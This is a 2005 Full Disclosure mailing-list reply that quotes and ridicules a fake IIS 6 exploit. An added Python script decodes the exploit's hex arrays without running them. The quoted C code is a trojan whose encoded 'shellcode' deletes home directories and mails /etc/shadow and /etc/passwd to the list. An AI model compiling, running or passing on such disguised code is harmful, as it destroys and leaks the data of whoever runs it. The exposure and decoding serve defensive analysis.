Full Disclosure mailing list archives
Re: IIS 6 Remote Buffer Overflow Exploit
From: Pbt <info16 () ifrance com>
Date: Tue, 19 Apr 2005 02:08:12 +0200
On Monday, 18 April 2005 at 16:53 -0700, Day Jay wrote:
> /* Proof of concept code
> Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you.
> DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
You're right to add this warning! :)
> Remote root.
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
Strange sc... :)
> main()
> {
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher); system(netcat_shell); system(shellcode);
Very stealth, awesome!!
> //int socket = 0;
> //double long port = 0.0;
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
> // for(int j; j < 30; j++)
> {
> //Find socket remote address fault
> printf(".");
Did you forget to add a printf("Waiting for your root shell...\n"); here, huh?
> }
> //overtake inetinfo here IIS_666666^
> return 0;
> }
OK, great work! Don't forget to send us your tcp stack remote r00t h4x0r 0day tomorrow :)

--
Pbt
Attachment:
signature.asc
Description: This is a digitally signed message part
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
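Pbt's "Strange sc..." is the whole point of the thread: the byte arrays in this "exploit" are not machine code at all, and the habit that protects you from this kind of PoC is to decode the string literals and read them before compiling anything. The following Python script is an added example, not code from the thread or from either poster. It takes the three `char` arrays quoted above as constructed text input, parses the `"\xNN"` literals the way a C compiler would concatenate them, and reports whether each payload is readable shell text and which risky tokens (destructive `rm`, reads of `/etc/shadow` or `/etc/passwd`, piping into `mail`) it carries. Nothing is ever executed; the token list and the verdict labels are this example's own choices.

```python
"""Decode the "shellcode" arrays of a suspected trojan PoC and report what they
really contain, without compiling or executing anything."""
import re

# Constructed input: the three arrays quoted in the thread above, copied as text.
FAKE_EXPLOIT_SOURCE = r'''
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
'''

# char <name> [] = "lit" "lit" ... ;   (adjacent literals concatenate in C)
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*((?:\s*"(?:[^"\\]|\\.)*")+)\s*;')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SIMPLE_ESCAPES = {"n": 0x0A, "t": 0x09, "r": 0x0D, "0": 0x00, "\\": 0x5C, '"': 0x22}
HEX_DIGITS = "0123456789abcdefABCDEF"

# Tokens chosen for this example. Real shellcode is machine code, so any
# readable shell text at all is already the finding; these just name the risk.
RISKY_TOKENS = {
    "destructive rm": b"rm -rf",
    "credential file read": b"/etc/shadow",
    "account file read": b"/etc/passwd",
    "mail exfiltration": b"|mail",
}


def unescape_c_literal(body: str) -> bytes:
    """Turn the inside of one C string literal into the bytes the compiler would emit."""
    out = bytearray()
    i = 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):
            nxt = body[i + 1]
            if nxt == "x":
                j = i + 2
                while j < len(body) and j < i + 4 and body[j] in HEX_DIGITS:
                    j += 1
                if j > i + 2:  # at least one hex digit followed \x
                    out.append(int(body[i + 2:j], 16))
                    i = j
                    continue
            if nxt in SIMPLE_ESCAPES:
                out.append(SIMPLE_ESCAPES[nxt])
                i += 2
                continue
        out.append(ord(ch))
        i += 1
    return bytes(out)


def extract_arrays(source: str) -> dict:
    """Map each char array name in the source to its decoded bytes."""
    arrays = {}
    for name, literals in ARRAY_RE.findall(source):
        arrays[name] = b"".join(unescape_c_literal(m) for m in LITERAL_RE.findall(literals))
    return arrays


def assess(payload: bytes) -> dict:
    """Say whether a payload is printable ASCII and which risky tokens it carries."""
    printable = all(0x20 <= b < 0x7F for b in payload)
    flags = [label for label, token in RISKY_TOKENS.items() if token in payload]
    return {
        "printable": printable,
        "text": payload.decode("ascii") if printable else None,
        "flags": flags,
    }


def report(source: str) -> dict:
    """Assess every array in a PoC source file; nothing here is executed."""
    return {name: assess(data) for name, data in extract_arrays(source).items()}


if __name__ == "__main__":
    for name, verdict in report(FAKE_EXPLOIT_SOURCE).items():
        kind = "shell text" if verdict["printable"] else "binary"
        print(f"{name}: {kind} {verdict['flags'] or ''}")
        if verdict["text"] is not None:
            print(f"    {verdict['text']!r}")
```

Run against the quoted source, every array decodes to plain shell text and each one trips at least one flag, which is the opposite of what genuine shellcode looks like (a byte string with a large share of non-printable values). The same parser works on any PoC that stores its payload as C string literals, so it is worth keeping around as a pre-compile sanity check.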
